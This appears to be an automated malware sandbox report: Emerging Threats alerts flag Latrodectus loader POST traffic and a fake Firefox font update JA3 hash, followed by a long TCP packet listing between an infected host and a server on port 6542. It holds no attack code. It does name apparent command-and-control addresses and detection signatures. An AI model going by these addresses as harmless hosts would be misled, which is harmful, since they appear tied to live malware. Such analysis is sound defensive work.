2024-12-02T18:42:05.415411+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50027	104.21.68.89	443	TCP
2024-12-02T18:42:06.835906+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50027	104.21.68.89	443	TCP
2024-12-02T18:42:08.224133+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-02T18:42:09.555826+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50032	104.21.68.89	443	TCP
2024-12-02T18:42:10.849973+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50033	104.21.16.251	443	TCP
2024-12-02T18:42:11.540882+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50033	104.21.16.251	443	TCP
2024-12-02T18:42:12.761517+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50034	104.21.16.251	443	TCP
2024-12-02T18:42:13.494514+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50034	104.21.16.251	443	TCP
2024-12-02T18:42:14.845763+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50035	104.21.16.251	443	TCP
2024-12-02T18:42:15.582966+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50035	104.21.16.251	443	TCP
2024-12-02T18:42:17.007950+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50036	104.21.16.251	443	TCP
2024-12-02T18:42:17.776156+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50036	104.21.16.251	443	TCP
2024-12-02T18:42:19.248403+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50037	104.21.16.251	443	TCP
2024-12-02T18:42:20.026699+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50037	104.21.16.251	443	TCP
2024-12-02T18:42:21.540616+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50038	104.21.16.251	443	TCP
2024-12-02T18:42:22.290666+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50038	104.21.16.251	443	TCP
2024-12-02T18:42:24.045301+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50039	104.21.16.251	443	TCP
2024-12-02T18:42:25.068260+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50039	104.21.16.251	443	TCP
2024-12-02T18:42:26.702583+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50040	104.21.16.251	443	TCP
2024-12-02T18:42:27.484092+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50040	104.21.16.251	443	TCP
2024-12-02T18:42:28.891574+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50041	104.21.16.251	443	TCP
2024-12-02T18:42:29.676480+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50041	104.21.16.251	443	TCP
2024-12-02T18:42:31.127177+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50042	104.21.16.251	443	TCP
2024-12-02T18:42:31.942287+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50042	104.21.16.251	443	TCP
2024-12-02T18:42:33.327528+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50043	104.21.16.251	443	TCP
2024-12-02T18:42:34.080539+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50043	104.21.16.251	443	TCP
2024-12-02T18:42:35.383394+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50044	104.21.16.251	443	TCP
2024-12-02T18:42:36.101383+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50044	104.21.16.251	443	TCP
2024-12-02T18:42:37.726874+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50045	104.21.16.251	443	TCP
2024-12-02T18:42:38.428947+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50045	104.21.16.251	443	TCP
2024-12-02T18:42:40.253728+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50046	104.21.16.251	443	TCP
2024-12-02T18:42:41.002330+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50046	104.21.16.251	443	TCP
2024-12-02T18:42:42.407431+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50047	104.21.16.251	443	TCP
2024-12-02T18:42:43.175130+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50047	104.21.16.251	443	TCP
2024-12-02T18:42:44.540661+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50048	104.21.16.251	443	TCP
2024-12-02T18:42:45.282106+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50048	104.21.16.251	443	TCP
2024-12-02T18:42:47.673602+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50049	104.21.16.251	443	TCP
2024-12-02T18:42:48.855372+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50049	104.21.16.251	443	TCP
2024-12-02T18:42:50.285356+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50050	104.21.68.89	443	TCP
2024-12-02T18:42:51.894786+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50050	104.21.68.89	443	TCP
2024-12-02T18:42:53.310811+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50051	104.21.68.89	443	TCP
2024-12-02T18:42:54.920793+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50051	104.21.68.89	443	TCP
2024-12-02T18:42:56.369892+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50052	104.21.68.89	443	TCP
2024-12-02T18:42:57.996951+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50052	104.21.68.89	443	TCP
2024-12-02T18:42:59.331534+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50053	104.21.68.89	443	TCP
2024-12-02T18:43:00.907175+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50053	104.21.68.89	443	TCP
2024-12-02T18:43:02.232328+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50054	104.21.68.89	443	TCP
2024-12-02T18:43:03.873929+0100	2048735	ET MALWARE Latrodectus Loader Related Activity (POST)	1	192.168.2.4	50054	104.21.68.89	443	TCP
2024-12-02T18:43:05.403333+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50055	104.21.68.89	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 18:39:04.698493004 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:04.819175959 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:04.819252014 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:04.827564955 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:04.947941065 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:06.328541040 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:06.328695059 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:06.328705072 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:06.328835964 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:06.474134922 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:06.594575882 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:06.998919010 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:06.998990059 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:07.027203083 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:07.147161961 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:19.406636000 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:19.406706095 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:19.407953024 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:19.527904034 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:19.528004885 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:19.528364897 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:19.648250103 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:21.033514023 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:21.033591986 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:21.034033060 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:21.035188913 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:21.154186964 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:21.155237913 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.921468973 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.921574116 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.921586037 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.921600103 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:32.921664953 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:32.922229052 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.922241926 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.922394037 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:32.922975063 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.922986984 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.923028946 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:32.923563957 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.923576117 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.923614979 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:32.929893970 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.929975033 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:32.930052996 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:32.930105925 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.046804905 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.046863079 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.111932993 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.111999989 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.131947041 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.132005930 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.168695927 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.168776035 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.220778942 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.220901012 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.232184887 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.232264996 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.252006054 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.252021074 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.252070904 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.252366066 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.252378941 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.252413988 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.252437115 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.253045082 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.253057003 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.253067970 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.253092051 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.253118038 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.253607988 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.253621101 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.253653049 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.253668070 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.254306078 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.254317045 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.254350901 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.254925013 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.254946947 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.254980087 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.254996061 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.255661964 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.255672932 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.255703926 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.255714893 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.256741047 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.256755114 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.256772041 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.256788969 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.256802082 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.257152081 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.257200003 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.305150032 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.305238962 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.305283070 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.305330992 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.343435049 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.343517065 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.343554020 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.343605042 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.347544909 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.347598076 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.347748041 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.347800970 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.354489088 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.354536057 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.354660034 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.354701996 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.373204947 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.373298883 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.373364925 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.373414993 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.376905918 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.376960039 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.377111912 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.377161026 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.385410070 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.385462999 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.385481119 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.385524988 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.393131018 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.393186092 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.393265963 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.393307924 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.399702072 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.399776936 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.399804115 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.399843931 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.406658888 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.406717062 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.406821966 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.406894922 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.414782047 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.414840937 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.414927006 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.414977074 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.421550035 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.421605110 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.421751976 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.421801090 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.429291010 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.429359913 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.429493904 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.429543972 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.435066938 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.435129881 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.435246944 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.435287952 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.440382957 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.440432072 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.440538883 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.440578938 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.445662975 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.445735931 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.445777893 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.445818901 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.450258970 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.450311899 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.450433969 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.450476885 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.455054998 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.455111027 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.455148935 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.455187082 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.460192919 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.460246086 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.460299015 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.460335970 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.465711117 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.465769053 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.497574091 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.497633934 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.497710943 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.497757912 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.500742912 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.500848055 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.500861883 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.500893116 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.506197929 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.506297112 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.508093119 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.508142948 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.508256912 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.508308887 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.513760090 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.513813972 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.513942957 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.513989925 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.519018888 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.519073963 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.519136906 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.519207001 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.556586027 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.556627989 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.556726933 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.556777954 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.558804035 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.558878899 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.559123993 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.559180021 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.564064026 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.564141035 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.564241886 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.564291954 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.569829941 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.569904089 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.569963932 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.570009947 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.574620962 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.574692965 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.574748993 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.574793100 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730679989 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730727911 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730740070 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730751991 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730763912 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730775118 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730781078 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730787039 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730811119 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730823040 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730834961 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730842113 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730848074 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730856895 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730859995 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730873108 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730875015 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730884075 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730892897 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730911016 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730921030 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730927944 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730935097 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730956078 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730958939 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730972052 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730972052 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.730982065 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730993986 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.730994940 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.731005907 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.731014013 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.731014967 CET	49734	6542	192.168.2.4	103.57.249.207
Dec 2, 2024 18:39:33.731024027 CET	6542	49734	103.57.249.207	192.168.2.4
Dec 2, 2024 18:39:33.731046915 CET	49734	6542	192.168.2.4	103.57.249.207
